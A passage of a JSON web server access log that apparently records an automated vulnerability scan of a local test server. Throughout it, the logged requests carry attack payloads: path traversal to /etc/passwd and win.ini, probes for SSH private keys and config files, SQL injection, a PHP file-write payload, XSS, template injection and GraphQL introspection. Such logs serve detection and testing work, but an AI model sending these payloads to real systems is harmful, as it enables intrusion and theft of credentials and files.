(KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prtg/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dumpmdm.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?rest_route=/whm/v3/themesettings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/custom.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysqldump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all_dbs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /moto/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v2/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRTG/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x22query\x22:\x22# Welcome to GraphiQL\x5Cn#\x5Cn# GraphiQL is an in-browser tool for writing, validating, and\x5Cn# testing GraphQL queries.\x5Cn#\x5Cn# Type queries into this side of the screen, and you will see intelligent\x5Cn# typeaheads aware of the current GraphQL type schema and live syntax and\x5Cn# validation errors highlighted within the text.\x5Cn#\x5Cn# GraphQL queries typically start with a \x5C\x22{\x5C\x22 character. Lines that starts\x5Cn# with a # are ignored.\x5Cn#\x5Cn# An example GraphQL query might look like:\x5Cn#\x5Cn# {\x5Cn# field(arg: \x5C\x22value\x5C\x22) {\x5Cn# subField\x5Cn# }\x5Cn# }\x5Cn#\x5Cn# Keyboard shortcuts:\x5Cn#\x5Cn# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\x5Cn#\x5Cn# Run Query: Ctrl-Enter (or press the play button above)\x5Cn#\x5Cn# Auto Complete: Ctrl-Space (or just start typing)\x5Cn#\x5Cn\x5Cn{\x5Cn users {\x5Cn nodes {\x5Cn id\x5Cn name\x5Cn username\x5Cn }\x5Cn }\x5Cn}\x22,\x22variables\x22:null,\x22operationName\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1/-/graphql-explorer", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-devtools HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.070","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Partners/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chpstrt.php?chppath=Home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisBT/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"\x0D\x0A\x0D\x0A generate_script\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A {{profile}}\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /etc/passwd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.212","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test\x22) and extractvalue(1,concat(0x7e,md5(1234567890))) -- a HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%22297MU5FK2pu2l7ux5lSuWnD9h2B.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sftp-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.004","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /EMSWebClient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess_for_page_not_found_redirects.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radio/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/Auth/ip_snmp.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x22dashboard\x22:{\x22annotations\x22:{\x22list\x22:[{\x22name\x22:\x22Annotations & Alerts\x22,\x22enable\x22:true,\x22iconColor\x22:\x22rgba(0, 211, 255, 1)\x22,\x22type\x22:\x22dashboard\x22,\x22builtIn\x22:1,\x22hide\x22:true}]},\x22editable\x22:true,\x22gnetId\x22:null,\x22graphTooltip\x22:0,\x22id\x22:null,\x22links\x22:[],\x22panels\x22:[],\x22schemaVersion\x22:18,\x22snapshot\x22:{\x22originalUrl\x22:\x22javascript:alert('Revers3c')\x22,\x22timestamp\x22:\x222020-03-30T01:24:44.529Z\x22},\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{\x22from\x22:null,\x22to\x22:\x222020-03-30T01:24:53.549Z\x22,\x22raw\x22:{\x22from\x22:\x226h\x22,\x22to\x22:\x22now\x22}},\x22timepicker\x22:{\x22refresh_intervals\x22:[\x225s\x22,\x2210s\x22,\x2230s\x22,\x221m\x22,\x225m\x22,\x2215m\x22,\x2230m\x22,\x221h\x22,\x222h\x22,\x221d\x22],\x22time_options\x22:[\x225m\x22,\x2215m\x22,\x221h\x22,\x226h\x22,\x2212h\x22,\x2224h\x22,\x222d\x22,\x227d\x22,\x2230d\x22]},\x22timezone\x22:\x22\x22,\x22title\x22:\x22Dashboard\x22,\x22uid\x22:null,\x22version\x22:0},\x22name\x22:\x22Dashboard\x22,\x22expires\x22:0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MU5FK2pu2l7ux5lSuWnD9h2B.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LICENSE.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.226","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 